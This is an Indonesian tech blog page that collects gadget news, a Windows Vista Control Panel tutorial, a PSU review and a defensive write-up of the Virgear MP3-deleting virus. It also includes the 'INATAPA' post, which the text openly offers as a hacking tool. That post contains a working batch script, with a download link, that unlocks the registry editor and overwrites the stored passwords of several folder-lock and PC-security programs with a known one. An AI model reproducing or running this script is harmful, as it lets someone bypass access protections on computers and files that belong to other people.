Daftar Isi

Read rest of entry

SmartQ 5

Bosan bermain di netbook, Ubuntu mulai merambah perangkat Mobile Internet Device. SmartQ mengumumkan kehadiran SmartQ 5, perangkat MID berbasis Linux Ubuntu dengan harga terjangkau. Kelebihan SmartQ 5 terletak pada kombinasi hardware dan softwarenya yang unik. Otaknya SmartQ 5 menggunakan prosesor ARM yang umumnya digunakan oleh handphone/ smartphone, sementara OS Ubuntu biasanya ditemukan di netbook. Kawin silang antara prosesor hemat daya dengan OS full desktop ini akhirnya menghasilkan perangkat fungsional nan murah. Harga MID ini sungguh menggiurkan. Di negara asalnya, China, SmartQ 5 dibanderol dengan harga di bawah MP3 player bermerk: hanya Rp 1,5 juta. Sedangkan untuk peluncuran di Singapura, harganya hanya terpaut sekitar Rp 400 ribu lebih mahal. Harga tersebut hanya berlaku pada masa promosi yang berlangsung selama bulan April. Setelah masa promosi berakhir, SmartQ 5 akan dijual dengan harga normal Rp 2,3 juta. by: T&t Magz

Read rest of entry

Ponsel Jam dari Hyundai

Hyundai Mobile Eropa, mengumumkan akan menyediakan ponsel jam yang inovatif yang akan ada di Eropa di akhir kuartal dua tahun ini. Ponsel jam ini adalah MB-910, dimana udah termasuk fitur headset Bluetooth, klien email, video, pemutar musik dan kontrol layar sentuh. Gadget ini udah terjual dengan sangat baik di Eropa. Hyundai mengharapkan MB-910 harga retailnya hanya 200 Euro tanpa SIM Card. Paket ponsel jam ini seberat 58g dan kuat 3 jam untuk waktu bicara, serta waktu standby yang luar biasa yaitu sampai 70 jam. Dengan headset Bluetooth sudah termasuk dalam harga tersebut. Ponsel jam tangan ini sudah Tri-Band, bisa bekerja di seluruh dunia. Hyundai MB-910 menargetkan konsumen yang ingin menggunakan teknologi terkini dengan harga yang terjangkau. Untuk gadget freak, ponsel jam MB-910 memiliki potensial menjadi aksesoris wajib yang penting dan kudu ada. Spesifikasi Teknis : Band: Triband 900/1800/1900 MHz Display: Type TFT Touch Display Resolution 132 x 176 Pixel Colour 65.000 Colours Technology: GPRS Class 12 Browser: WAP 2.0 Connectivity: Bluetooth® 2.0 / USB Data Cable Messaging: MMS / SMS Ringtones: 64 Polyphonic Battery : 400 mAh Talking-Time: up to * 3 h Standby-Time: up to * 70 h Color: Silver Dimensions: 58 x 44 x 16 mm Weight : 58g (dengan baterai standart) by: T&t Magz

Read rest of entry

FB di Windows Mobile

Pembuat software raksasa Microsoft kemarin merilis aplikasi Facebook yang dapat digunakan untuk OS Windows Mobile 6. Untuk membuat posting wall, share foto, mengirim pesan, mengupdate profile, bahkaln mengupload video. Software gratisan Facebook untuk Windows Mobile 6, adalah aplikasi pertama yang memperbolehkan pemakai untuk mengupload video langsung dari smartphone mereka. Dalam aplikasi ini juga menawarkan fitur paling inti seperti kemampuan untuk memanggil orang di daftar teman-teman mereka, mengatur profile Facebook, mengkonfirmasi permintaan teman, upload dan mentag foto, update status, dan masih banyak lagi. Microsoft berkata, versi aplikasi Facebook ini akan dapat di gunakan dengan OS Windows Mobile 6.5 saat aplikasi ini di rilis nanti pada tahun ini. by : T&t Magz

Read rest of entry

Rival iPhone, Toshiba TG01

Gencarnya serangan iPhone, membuat banyak vendor kompetitor mencoba untuk menyaingi ponsel touch screen tersebut. Toshiba memperkenalkan Toshiba TG01, sebuah smartphone full touchscreen dengan prosesor tercepat di dunia yang akan menjadi rival iPhone. Apa saja fitur yang dimiliki oleh Toshiba TG01 Toshiba TG01 ini menggunakan OS Windows Mobile 6.1, Toshiba TG01 telah menyembunyikan antarmuka asli WinMo yang buruk pada TG01 dan menggantikannya dengan antarmuka custom bernuansa 3D sehingga pengguna tidak akan menyadari jika mereka sebenarnya menggunakan sebuah smartphone WinMo. Toshiba TG01 menjamin penggunaan antarmuka tersebut tidak akan menggangu kinerja smartphone, karena mereka menggunakan prosesor Snapdragon 1GHz, prosesor smartphone tercepat di dunia saat ini. Penggunaan prosesor yang cepat pada Toshiba TG01 tidak hanya ditujukan untuk mempermanis antarmuka saja. Snapdragon mampu membuat tampilan video, game, dan web browsing menjadi lebih halus tanpa kendala di Toshiba TG01. Toshiba juga membawa keahlian mereka di bidang TV yang terkenal lewat brand REGZA, dan mengadaptasinya ke display widescreen Toshiba TG01. Secara fisik, Toshiba TG01 juga sangat atraktif dengan dimensi 128x70x9.9mm yang ramping. Kombinasi antara prosesor kuat, layar tajam, dan desain ultra slim berhasil menghasilkan sebuah smartphone yang diyakini akan mampu menandingi iPhone. Toshiba TG01 diperkirakan hadir pada musim panas tahun ini, atau sekitar bulan Juni. by: T&t Magz

Read rest of entry

BlackBerry STORM 2 Exclusive

Inilah kemunculan awal ke publik salah satu handset BlackBerry yang paling ditunggu-tunggu. BlackBerry Storm 2 akhirnya memunculkan batang hidungnya, walau lum benar-nbenar di munculkan di pasaran BlackBerry Storm 2 sebentar lagi akan diluncurkan. RIM telah mengkonfirmasi keberadaan BlackBerry Storm 2, suksesor dari BlackBerry Storm. Meskipun mereka belum memberikan pernyataan resmi tentang handset BlackBerry ini, tetapi diperkirakan smartphone ini akan hadir di pasaran sebelum tahun ini berakhir. Smartphone yang memiliki nama sandi Oden ini mendapatkan sebuah fitur yang tadinya lupa ditanamkan oleh RIM pada BlackBerry Storm, yaitu koneksi Wi-FI. Beberapa spy shot sudah di dapat dan berhasil mengabadikan BlackBerry Storm 2 di habitat aslinya dengan kamera. Tidak butuh waktu lama sebelum foto tidak resmi BlackBerry Storm 2 ini akhirnya beredar luas di internet. Seperti terlihat di foto, smartphone ini terlihat ramping. Selain itu, RIM sepertinya telah menggantikan tombol keempat dengan pad touch-sensitive. by: T&t Magz

Read rest of entry

Di Indonesia MAHAL, Di Malaysia GRATIS...!!!

Berbarengan dengan Indonesia, Maxis Communication juga akan meluncurkan iPhone 3G di Malaysia pada tanggal 20 Maret 2009 mendatang. Lebih berani dari Telkomsel, Maxis malah menawarkan iPhone gratis untuk menarik pelanggan.

Maxis memberikan beberapa pilihan tarif untuk pelanggan iPhone 3G 8 dan 16 GB. Tarif pascabayar yang diberi nama iValue ini terdiri dari beberapa pilihan paket yang tarifnya dimulai dari RM 100 per bulan, atau sekitar Rp 324 ribu. Untuk menarik minat pelanggan, Maxis berani memberikan iPhone 8 GB gratis. Syaratnya, pelanggan harus menandatangani kontrak untuk berlangganan paket ivalue selama 24 bulan dengan tarif RM 375 (Rp 1,2 juta) per bulan.

Acara peluncuran iPhone 3G akan diadakan Jumat 20 Maret 2009 pada pukul 19.00 waktu setempat di Kual a Lumpur Cnvention Centre, di mana pelanggan yang telah melakukan pra-registrasi akan diundang untuk mengambil iPhone mereka. iPhone 3G tidak akan berfungsi optimal tanpa dukungan jaringan yang memadari. Karena itu, demi menyediakan akses koneksi 3G yang lebih cepat, Maxis telah menyuntikkan dana investasi sebesar RM 1,6 Milyar. Maxis pun optimis iPhone 3G akan mendapat sambutan yang positif dari pelanggan mereka yang selama ini telah menanti handset revolusioner tersebut.

By : T&t

Read rest of entry

Membuat Script Indonesia Jaya Tembus Password

Ola...Ola....
Neh ada yg terbaru dari jasakom buat ngehack password, mudah-mudahan bermanfaat....

Script atau program mini imut2 ini saya namakan INATAPA, singkatan dari Indonesia Jaya Tembus Password. Mengapa namanya begicu ?

Karena script ini akan mengubah password dari program-program yang anda lupa/tidak tahu passwordnya - akan diubah menjadi password resetnya yaitu Indonesia Jaya.

Mengapa passwordnya harus "Indonesia Jaya"?
Nggak ada alasan khusus sih. Kadang tidak semua program mau menerima password kosong, sehingga mendingan dibuat ada saja.








Scriptnya bisa dibuat dengan Notepad,

Cuplikan scriptnya seperti di bawah ini :




@echo off

Title INATAPA v01 - 2008
echo.
echo INATAPA v01 : Indonesia Jaya Tembus Password versi 01
echo ---------------------------------------------------------------------------
echo Script Kecil untuk membuka file konfigurasi berbagai Program Security
echo.
echo Oleh : Lovepassword - www.lovepassword.blogspot.com
echo Kredit : TopengDigital - www.topengdigital.com
echo.
echo Program ini bebas dicopy serta dimodifikasi oleh siapapun
echo.

:PILIHAN
echo.
echo Silakan pilih Program yang ingin anda buka file konfigurasinya
echo ---------------------------------------------------------------------------
echo.
echo 0. Regedit Standard
echo 1. PC Security (dicoba dengan versi 6.4 ) - www.tropsoft.com
echo 2. FolderGuard (dicoba dengan versi 7.91) - www.winability.com
echo 3. MySecretFolderXP (dicoba dengan versi 4.31) - www.winability.com
echo 4. Hide File and Folder (dicoba dengan versi 3.1 ) - www.softstack.com
echo 5. Folder Lock (dicoba dengan versi 5.90) - www.newsoftwares.net
echo 6. Hide Folder (dicoba dengan versi 3.1 ) - www.hide-folder.com
echo 7. EasyFile nF Protector(dicoba dengan versi 3.9 ) - www.softstack.com
echo 8. Winboost (dicoba dengan versi 4.9 ) - www.winboost.com
echo 9. USB Lock (dicoba dengan versi 2.5 ) - www.advansysperu.com
echo 10. - Keluar dari Program ini
echo 91. - Sikat Semua Program yang terdaftar
echo.
echo Dalam banyak kasus - versi program biasanya tidak ada pengaruhnya.
echo ----------------------------------------------------------------------------
Set /P pilih= Pilih Nomor program :
cls
For %%a In (0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 91) Do if "%pilih%"=="%%a" Goto Pilihan_%%a
echo.
echo Salah Input ! Pilihan 0 sd 9 untuk memilih program
echo.
echo Atau pilih 10 untuk keluar atau 91 untuk memilih semua program
echo.
echo Tekan Sembarang Tombol untuk kembali
pause>NUL
cls
Goto PILIHAN



:Pilihan_0
echo 0. Anda memilih membuka proteksi Regedit
echo -----------------------------------------------------------------
REG ADD HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesSystem /v DisableRegistryTools /t REG_DWORD /d 0 /f

echo.
if Not "%Pilih%" == "91" (
echo.
pause
cls
Goto PILIHAN )


:Pilihan_1
echo 1. Anda memilih masuk file konfigurasi PC Security
echo -----------------------------------------------------------------
echo.
if exist %temp%_PCSecurity.reg del %temp%_PCSecurity.reg
Start /wait REGEDIT /E %temp%_PCSecurity.reg "HKEY_LOCAL_MACHINESOFTWAREMicrosoft rsys"
if not exist %temp%_PCSecurity.reg echo Registry PC Security tidak ditemukan
echo.
if not exist %windir%dwpces23.dru echo File Password PC Security tidak ditemukan
echo.

if exist %windir%dwpces23.dru (
echo File Password PC Security ditemukan, Password akan dibackup dan direset
copy %windir%dwpces23.dru %temp%dwpces23.dru
del %windir%dwpces23.dru
echo.)

if exist %temp%_PCSecurity.reg (
echo Registry PC Security ditemukan, Password akan dibackup dan direset
Echo Windows Registry Editor Version 5.00 > %Temp%obol.reg
Echo [HKEY_LOCAL_MACHINESOFTWAREMicrosoft rsyscopp] >> %Temp%obol.reg
Echo "s"=hex:56,11,ad,21,7b,08,bc,1b,6e,c3,93,13,86,04,49,b2,0d,a3,49,b2,60,e8,8c, >>%Temp%obol.reg
Echo 07,5f,ec,9d,0b,0d,a3,49,b2,0d,a3,49,b2,0d,a3,49,b2,60,e8,8c,07,5f,ec,9d,0b, >>%Temp%obol.reg
echo 0d,a3,49,b2,0d,a3,49,b2,0d,a3,49,b2 >>%Temp%obol.reg
Start /w REGEDIT /S "%temp%obol.reg"
del %Temp%obol.reg
echo.
echo * Untuk masuk PC Security, Masukkan Password : Indonesia Jaya)

echo.
if Not "%Pilih%" == "91" (
echo.
echo - Tekan sembarang Tombol
pause>nul
cls
Goto pilihan)


:Pilihan_2
echo 2. Anda memilih masuk file konfigurasi FolderGuard
echo -----------------------------------------------------------------
echo.
if exist %temp%_FolderGuard.reg del %temp%_Folderguard.reg
Start /wait REGEDIT /E %temp%_FolderGuard.reg "HKEY_LOCAL_MACHINESOFTWAREWinabilityFGD"

if exist %temp%_FolderGuard.reg (
echo Registry Folderguard ditemukan, Password akan dibackup dan direset
Echo Windows Registry Editor Version 5.00 > %Temp%obol.reg
Echo [HKEY_LOCAL_MACHINESOFTWAREWinAbilityFGD] >> %Temp%obol.reg
Echo "FGP"=hex:46,47,50,00,09,04,00,00,73,bc,00,00,00,00,00,00,00,00,00,00 >> %Temp%obol.reg
Start /w REGEDIT /S "%temp%obol.reg"
del %Temp%obol.reg
echo.
echo * Untuk masuk Folderguard, Masukkan Password : Indonesia Jaya)

if not exist %temp%_Folderguard.reg echo Registry FolderGuard tidak ditemukan
echo.

if Not "%Pilih%" == "91" (
echo.
echo - Tekan sembarang Tombol
pause>nul
cls
Goto pilihan)

:Pilihan_3
echo 3. Anda memilih masuk file konfigurasi My Secret Folder XP
echo -----------------------------------------------------------------
echo.
if exist %temp%_MySecretFolder.reg del %temp%_MySecretFolder.reg
Start /wait REGEDIT /E %temp%_MySecretFolder.reg "HKEY_LOCAL_MACHINESOFTWAREWinabilityMySecretFolder"

if exist %temp%_MySecretFolder.reg (
echo Registry My Secret Folder XP ditemukan, Password akan dibackup dan direset
Echo Windows Registry Editor Version 5.00 > %Temp%obol.reg
Echo [HKEY_LOCAL_MACHINESOFTWAREWinAbilityMySecretFolder] >> %Temp%obol.reg
Echo "AdminData"=hex:a9,47,dd,be,cf,04,ef,2e,f4,43,d8,0f,bd,ad,92,bb,18,5a,2e,5e >> %Temp%obol.reg
Start /w REGEDIT /S "%temp%obol.reg"
del %Temp%obol.reg
echo.
echo * Untuk masuk My Secret Folder XP, Masukkan Password : Indonesia Jaya)

if not exist %temp%_MySecretFolder.reg echo Registry My Secret Folder XP tidak ditemukan
echo.

if Not "%Pilih%" == "91" (
echo.
echo - Tekan sembarang Tombol
pause>nul
cls
Goto pilihan)

DAN SETERUSNYA >>>

Daripada para teman pusing mengetik, silakan anda Download aja disini :
http://www.ziddu.com/download/3624397/INATAPA.zip.html


Script tersebut sudah dilengkapi kemampuan membackup password aslinya. Hanya saja tidak ada fitur untuk mengembalikan password lama yang direset tadi. Mungkin akan saya buat sambungannya dengan script yang lain.

SALAM

by : Jasakom

Read rest of entry

Edifier S750 Gaming Sound

Bagi para gamer sejati yang slalu duduk didepan kompi, pasti ingin mendengar suara game yg dimainkan meledak dan menggelegar dengan dahsyatnya. Edifier S750 adalah pilihan yang tepat untuk kebutuhan tersebut. karena memnag dapat membuat jantung bergetar mendengarnya. Ini dikarenakan power yang dimiliki S750 ini sangat mumpuni.

SPECIFICATIONS
- Power output: RMS 5 x 75W + 180W (THD=10%)
- System under developing FEATURES
- Heavy metal 5.1 speaker system with 10 inch subwoofer
- Dolby Digital & Prologic II inside
- Wooden MDF housing for all speakers
- Passive radiator on both sides on the subwoofer to exaggerate bass performance
- Magnetically shielded drivers for all speakers
- Switchable analog/digital input ports for most kinds of audio source
- Multifunctional wire controller with 2.5 inch LCD display (dimmer included)
- Headphone output on wired remote controller
- Master volume controls both speaker output and headphone output
- Volume booster for extra power output
- Separate bass and treble adjustments
- Multifunctional wireless remote controller included

Gimana ?? tertarik ???

Read rest of entry

Membuat Control Panel Sendiri

BUAT FOLDER

Untuk membuat “Control Panel” sendiri, pertama kita buat sebuah folder. Klik kanan tombol Start dan kemudian pilih Explore. Ketika folder Start Menu tampil, klik ganda folder Programs. Ketika folder Programs tampil, klik menu Organize pada toolbar Windows Explorer dan kemudian pilih New Folder. Selanjutnya, beri nama folder tersebut My Control Panel atau apa pun yang Anda suka.

GANTI ICON FOLDER

Sekarang, klik kanan folder My Control Panel, dan kemudian pilih Properties. Pilih tab Customize, dan kliktombol Change Icon pada panel Folder icons. Ketika kotakdialog Change Icon tampil, pilih icon untuk membedakan foldetersebut dari semua folder lainnya pada menu Start.

SERET FOLDER KE MENU START

Sekarang, seret folder My Control Panel dari folder Pro-grams dan arahkan ke tombol Start. Ketika menu Start terbuka, seret folder My Control Panel dan jatuhkan ke bagian paling atas menu Start. Sampai di sini, Anda bisa memasukkan tools ke “Control Panel”.

MASUKKAN TOOL (1)

Untuk memasukkan tools ke “Control Panel”, buka folder My Control Panel dari menu Start. Selanjutnya, buka Control Panel yang asli dan pilih Classic View. Sekarang, seret dan jatuhkan tools yang paling sering Anda gunakan dari Control Panel yang asli ke folder My Control Panel. Biasanya membuat shortcut dengan cara drag-and-drop sudah mencukupi. Namun seperti yang Anda ketahui, banyak tools yang terdapat di dalam tool lain. Sebagai contoh, untuk ke Display Settings, Anda harus membuka Personalization dulu.

MASUKKAN TOOL (2)

Untungnya beberapa shortcut command line tools lama masih eksis di Windows Vista dan Anda bisa meng-gunakannya. Tools Control Panel Windows Vista bisa ditemukan di folder Windows\System32 (dalam file CPL). Anda bisa menjalankannya dengan menggunakan format perintah: control tool.cpl di mana tool adalah tool Control Panel. Jika tool tersebut mempunyai beberapa tab, Anda bisa membuat shortcut langsung ke tab yang dituju dengan menggunakan format perintah: control tool.cpl,,# di mana # adalah nomor tab yang dituju. Beberapa shortcut command line bisa Anda lihat pada boks.

GANTI NAMA SHORTCUT

Ketika menyeret tools, Windows Vista akan membuat shortcut ke tools tersebut. Windows Vista akan menambahkan “- Shortcut” ke setiap nama tools. Tentu saja, Anda bisa menghapus tambahan tersebut dan mengganti nama sesuai yang diinginkan. Ketika sudah selesai, tutup folder My Control Panel dan Control Panel yang asli. Sekarang ketika Anda ingin menjalankan tools yang sering digunakan, cukup klik tombol Start dan pilih icon My Control Panel.

SHORTCUT COMMAND LINE CONTROL PANEL

Kategori Personalization: tab Display Settings (desk.cpl), Desktop Icon Settings (control desk.cpl,,0), Screen Saver Set-tings (desk.cpl,,1), dan Appearance Settings (desk.cpl,,2).

Ketegori System Properties: tab Computer Name (sysdm. cpl), Hardware (sysdm.cpl,,2), Advanced (sysdm.cpl,,3), System Protection (sysdm.cpl,,4), dan Remote (sysdm.cpl,,5)

Kategori Internet Properties: tab General (inetcpl.cpl), Security (inetcpl.cpl,,1), Privacy (inetcpl.cpl,,2), Content (inetcpl. cpl,,3), Connections (inetcpl.cpl,,4), Programs (inetcpl.cpl,,5), dan Advanced (inetcpl.cpl,,6).

Kategori Mouse Properties: tab Buttons (main.cpl), Pointers (main.cpl,,1), Pointer Options (main.cpl,,2), Wheel (main.cpl,,3), dan Hardware (main.cpl,,4).

Kategori Regional and Language Options: tab Formats (intl.cpl), Location (intl.cpl,,1), Keyboards and Languages (intl. cpl,,2), dan Administrative (intl.cpl,,3).

Kategori Sound: tab Playback (mmsys.cpl), Recording (mmsys.cpl,,1), dan Sounds (mmsys.cpl,,2).

Read rest of entry

PSU : TAGAN TG500-BZ

TAGAN TECHNOLOGY CO. yang cukup terkenal dengan produk casing high-end-nya, mencoba memberikan pilihan produk PSU (Power Supply Unit) untuk pasar Indonesia. Tagan TG500-BZ, produk ini disebut dengan PipeRock series. Sesuai namanya, PSU ini memiliki daya 500W. Tidak ada pengontrol apapun yang disertakan dalam produk ini untuk hanya sekadar mengetahui kinerja dari produk tersebut. PSU ini mampu mengakomodasi sebuah komputer yang memerlukan daya mencapai 500W.

Desainnya memang cukup unik. Dengan warna hitam dan berbahan solid SECC Steel memang menunjukkan PSU ini sangat powerful. Pendinginan dari PSU ini dipercayakan dengan sebuah fan saja yang berukuran 13,5 cm. Yang membuat produk ini unik adalah adanya fitur yang disebut dengan PipeRock Cable Management, di mana terdapat beberapa konektor yang bisa dihubungkan dengan kabel secara terpisah, berbeda denga PSU kebanyakan yang seluruh kabelnya berasal dari satu buah lubang. Sehingga dengan begitu, Anda bisa mengatur sendiri berapa kebutuhan kabel yang Anda perlukan untuk perangkat di dalam PC Anda.

Fluktuasi daya yang dialami oleh masing-masing rail tidak terlalu signifikan. Baik itu rail tegangan +3.3V, +5V maupun +12V tidak mengalami penurunan daya yang cukup banyak. Penurunan tegangan masih di bawah +/- 5% dari nilai semestinya masing-masing rail. Hal ini masih dianggap wajar dan tidak terlalu mengganggu.

Yang paling menarik adalah paket penjualan yang diberikan, total ada dua tas terpisah yang dikemas dalam sebuah packaging yang cukup kokoh. Satu tas berisi perangkat kabel-kabel berwarna-warni yang menunjukkan masing-masing fungsinya. Terdapat total lima kabel yang siap dipasang dalam PSU tersebut. Tas yang ke-2 berisi unit PSU-nya di mana pada PSU tersebut ada beberapa konektor untuk menyambung ke kabel yang terpisah tersebut. Ditambah dengan kabel ground yang juga sudah terintegrasi di dalam PSU tersebut.–APHJ

PRODUK / DATA TEST

PRODUK / HARGA	Tagan TG500-BZ / Rp1.075.000 (kisaran)
Manufactur Kontak Website	Tagan Technology Co. Techno Solution / (021) 62304380 www.tagan.com

DATA TEKNIS / PERLENGKAPAN

Power Rating ATX Version PFC Input Frequency Range AC Input DC Output Jumlah / Ukuran Fan Manajemen Fan Berat Fitur Tambahan Paket Penjualan

500 Watt 12V/V 2.2 Active 50~60Hz 100-240Vac 10-6A +3.3V 24 Amperes +5V 24 Amperes +12V1 20 Amperes +12V2 20 Amperes -12V 0.8 Amperes +5V (standby) 3 Amperes 1 / 135mm - 2,88kg - User Manual, Tas terpisah berisi: Kabel Power, kabe input terpisah, obeng, sekrup, cable ties, sarung tangan.

PLUS / MINUS

+ Performa cukup baik dan stabil, konektor berlimpah, fitur active PFC.

- Harga tinggi.

Read rest of entry

Virus VIRGEAR " si Penghapus MP3"

WAH, ada lagu Agnes Monica yang “Matahariku””, sahutDencu. Karena itu lagu kesenangannya, tanpa ragu ia punlangsung menjalankannya dengan cara mengklik ganda filetersebut. Namun apa yang terjadi, bukan lagu Agnes yang iadapatkan, tapi semua file MP3 beserta file video kesayangan miliknya hilang dalam sekejap. Kok bisa? Itu salah satu tandanya telah terinfeksi oleh Virgear.

Tipuan Virgear

Virgear memang virus biasa saja, artinya ia tidak memiliki teknikinfeksi yang kompleks seperti halnya yang dilakukan virus lama Brontok maupun Maxtrox yang baru–baru ini menyebar.

Virgear dibuat menggunakan Visual Basic. Sampai tulisan ini dibuat, terdapat tiga varian dari Virgear yang kami dapat. Varian pertama yang kami temukan memiliki ukuran fi le sebesar 16.896 bytes, yang kemungkinan besar di-pack menggunakan UPX dan di-scramble untuk menyembunyikan identitas dari packer yang digunakan. Yang kedua, memiliki ukuran fi le sebesar 49.152 bytes, murni tanpa di-pack. Dan yang ketiga, atau Virgear.C, memiliki ukuran sebesar 19.968, yang juga kemungkinan besar di-pack menggunakan UPX dan di-scramble seperti halnya varian pertama.

Yang akan coba dibahas kali ini adalah varian Virgear.A. Walaupun sebenarnya perbedaan dari setiap varian tidaklah terlalu signifikan, hanya di nama–nama fi le virus yang digunakan untuk menyebar. Dan satu hal yang tidak berubah antara varian yang satu dengan yang lainnya adalah icon yang digunakan. Ia menggunakan icon yang mirip dengan file .MP3 milik aplikasi WinAmp. Yang dilakukannya ini cukup banyak menipu para korbannya. Walaupun sebenarnya hal ini tidak perlu terjadi, jika Anda mampu membedakannya antara file asli dan file virus.

Bersarang di System

Ia akan meng-copy-kan beberapa file yang merupakan duplikat dari dirinya ke direktori yang ia beri nama system. Direktori ini terletak di bawah direktori System32 milik Windows. Pada direktori tersebut akan terdapat beberapa file dengan nama VirGear.exe, smss.exe, Gazette.exe, Gazerock.exe, dan Nugen. exe. Direktori system dan kelima file tersebut ber-attribut hidden dan system, jadi secara setting-an default Windows tidak akan terlihat oleh kasat mata. Lalu, kelima file itu akan ia jalankan.

Untuk dapat aktif otomatis, ia membuat beberapa item baru di Registry Run dengan nama seperti Winamps, Nullsoft, JetAduio, CoolEditV2, dan AdobeAudition. Nama yang dibuat memang terlihat mirip dengan nama beberapa aplikasi multimedia. Tentu saja ini bertujuan untuk tidak membuat user curiga.

Saat user menjalankan file virus, ia akan mencoba untuk membuka file Clock.avi yang secara default terletak pada direktoriWindows untuk dijalankan pada Windows Media Player. Pada rutin virusnya terlihat bahwa fungsi ini akan diaktifkan apabila virus dijalankan bukan pada direktori induknya, yakni system.

Matikan UAC

Untuk melancarkan aksinya ia mengeset registry untuk tidak menampilkan file hidden dan system, serta menyembunyikan setiap extension yang dikenali oleh Windows. Selain itu, fungsi windows lainnya seperti System Restore dan Find/Search juga ia disable. Serta, ia pun mencoba untuk mematikan UAC (User Account Control) yang ada pada Windows Vista. Walaupun sebenarnya, virus ini tidak dapat berjalan mulus di Vista pada user account selain administrator, tentu saja karena terbentur masalah privilages yang lebih ketat dibandingkan operating system sebelumnya, terkecuali memang Anda dengan sengaja menjalankan dengan perintah “Run as administrator”.

Matikan Virus Lain

Untuk menjadi penguasa tunggal di komputer terinfeksi, ia mencoba untuk mematikan virus lain dengan memasukkan nama file yang dikenal sebagai nama file induk virus tersebut pada Registry Image File Execution Options, seperti kspoold. exe, HokageFile.exe, atau HOKAGE4.exe. Selain itu, ia pun menambahkan beberapa nama file lain seperti Setup.exe, In-stall.exe, msiexec.exe, regedit.exe, dan juga nama file antivirus termasuk PCMAV-CLN.exe dan PCMAV-RTP.exe.

Selain itu, virus ini juga menghalau user untuk masuk dalam modus safe-mode, dengan menghapus setingan yang berkaitan ini di Registry.

Timer Penyebaran

Virus ini memiliki komponen Timer. Salah satunya komponen Timer yang ia namakan Penyebaran. Timer ini diset untuk memiliki interval sebesar 60000ms. Ia bertugas untuk membuat file induk dan menyebarkan diri ke setiap drive yang ia temukan, termasuk Remote Drive. Artinya, ia juga dapat menyerang drive yang di share pada jaringan setempat.

Pada saat menyerang removable drive ataupun remote drive, ia akan menciptakan dua buah fi le baru dengan nama Autorun.inf dan Winamps.exe dengan attribut hidden dan system. Selain itu, sebuah direktori baru dengan nama My Music 2008 juga akan diciptakan, pada direktori tersebut akan berisi banyak sekali file MP3 palsu yang sebenarnya merupakan virus itu sendiri. Nama yang ia gunakan seperti Agnes_Monica_-_Mataha-riku__Ost._Jelita_.mp3 ,.exe, Dewiq_feat_Kaka_-_BeTe.mp3,.exe, dan masih banyak lagi yang lainnya. Dan nama – nama ini yang selalu di-update di setiap varian barunya.

Jika Anda lebih teliti, terdapat beberapa kejanggalan pada nama file tersebut. Contohnya pada virus ini, terdapat tanda titik setelah ekstensi, misalkan “Agnes Monica.mp3.”. Tanda titik tersebut mengisyaratkan bahwa sebenarnya terdapat extension asli dibelakang extension tersebut. Secara default Windows, extension asli ini tidak akan diperlihatkan, apalagi virus ini pun juga mengeset Windows untuk tidak menampilkan extension asli. Selanjutnya, Anda ubah tampilan Windows Explorer ke modus Details (View -> Details), di bagian Type akan terlihat tipedari file tersebut. File MP3 yang asli memiliki Type contohnya seperti “MPEG Layer 3 Audio File”, “MP3 Format Sound”, atau sejenisnya. Jika Type nya adalah Application, bisa dipastikan itu adalah virus. Selain itu, lihat juga tampilan dari fi le tersebut. Apabila file yang Anda curigai memiliki jumlah spasi yang sangat banyak terutama di bagian akhir, Anda juga harus waspada, karena bisa jadi diakhir spasi yang segitu banyak terdapat extension asli virus yang sebenarnya, misalkan seperti yang dilakukan oleh virus ini “Dewiq_feat_Kaka_-_BeTe.mp3 [%spasi yang sangat banyak%] ,.exe”. Terlihat bahwa extension asli file tersebut adalah EXE (executable) dan bukanlah MP3. Maka dari itu, lebih baik setting-lah Windows Explorer Anda dengan masuk ke menu Folder Options, lalu memilih “Show hidden files and folders”, serta menghapus centangan ([1]) pada “Hide extensions for known fi le types” dan “Hide protected operating system fi les (Recommended)”.

Cari dan Hapus!

Beberapa pembaca mengaku bahwa saat melakukan pembasmian menggunakan PCMAV, ia menghapus setiap file MP3 yang telah terinfeksi oleh virus ini. Padahal kenyataan sebenarnya adalah virus ini tidak menginfeksi atau lebih tepatnya menginjeksi masuk ke dalam file MP3 tersebut. Yang ia lakukan adalah mencari ke setiap penjuru drive akan keberadaan file MP3, jika ia menemukannya, maka akan langsung ia hapus dan digantikan dengan file virus dengan nama yang hampir mirip dengan nama file aslinya. Jadi, file MP3 Anda yang asli memang benar–benar dihapus oleh virus ini tanpa ampun. Dan sedihnya lagi, hal ini tidak ia lakukan hanya pada fi le MP3 saja, melainkan juga pada file .3GP, .AVI, .RM, .WMV, .ASF, .MPG, .MPEG, dan .MP4.

Basmi Virgear!

Silakan gunakan PCMAV yang telah disempurnakan ini. Dan dikarenakan virus ini dapat memblok PCMAV, Anda diharuskan merename terlebih dahulu file PCMAV-CLN.EXE sebelum digu-nakan, misalkan menjadi 123456.EXE ataupun nama lain dengan extension .EXE. Sementara untuk file yang telah terlanjur dihapus oleh virus ini, segeralah lakukan recovery.

By : PC Media

Read rest of entry

Notebook Dua Layar Dari Lenovo

Pasaran notebook semakin hari semakin ketat. Oleh karena itu, inovasi serta kreatifitas penting dilakukan oleh produsen notebook untuk bersaing memperebutkan hati konsumen. Lenovo, salah satu pemain veteran dalam dunia komputasi mobile sekali lagi meluncurkan salah satu produk notebook mereka dengan feature menarik.

W700ds, seri notebook workstation terbaru dari Lenovo hadir dengan disain dua layar LCD monitor. Mobile workstation dari Lenovo ini ditujukan bagi para profesional di bidang kreasi digital content, fotografi, serta bidang disain grafis lainnya.

Melihat banyaknya pengguna komputer desktop yang membutuhkan dua layar monitor dalam melakukan pekerjaanya, Lenovo berinisiatif meluncurkan disain dua layar pada notebooknya. Hal ini diambil untuk mengakomodasi pengguna yang membutuhkan fungsionalitas dua layar pada media bergerak seperti notebook. Fungsi-fungsi unik dari mobile workstation Lenovo seperti color calibrator, serta tambahan digitizer (opsional) juga menambah fungsinya sebagai media kreasi digital content yang mobile.

W700ds dilengkapi dengan dengan dua layar monitor LCD. Layar pertama sebesar 17-inci menjadi layar utama dalam beraktivitas. Layar kedua berupa LCD sebesar 10,6 inci menjadi layar tambahan yang difungsikan untuk memperluas bidang penglihatan. Layar kedua terletak tepat di belakang layar pertama. Untuk menggunakannya, Anda tinggal menarik layar tersebut ke samping kanan. Komposisi dua layar ini menambah ketebalan beberapa milimeter pada rancang –bangun notebook tersebut. Menurut Lenovo, intensitas cahaya (brightness) dari kedua layar ini lebih baik dari seri-seri notebook Lenovo sebelumnya.

Spesifikasi:

• Intel's Quad-Core ataupun Extreme Processors, dengan 8GB DDR3 RAM
• NVIDIA Quadro FX mobile graphics
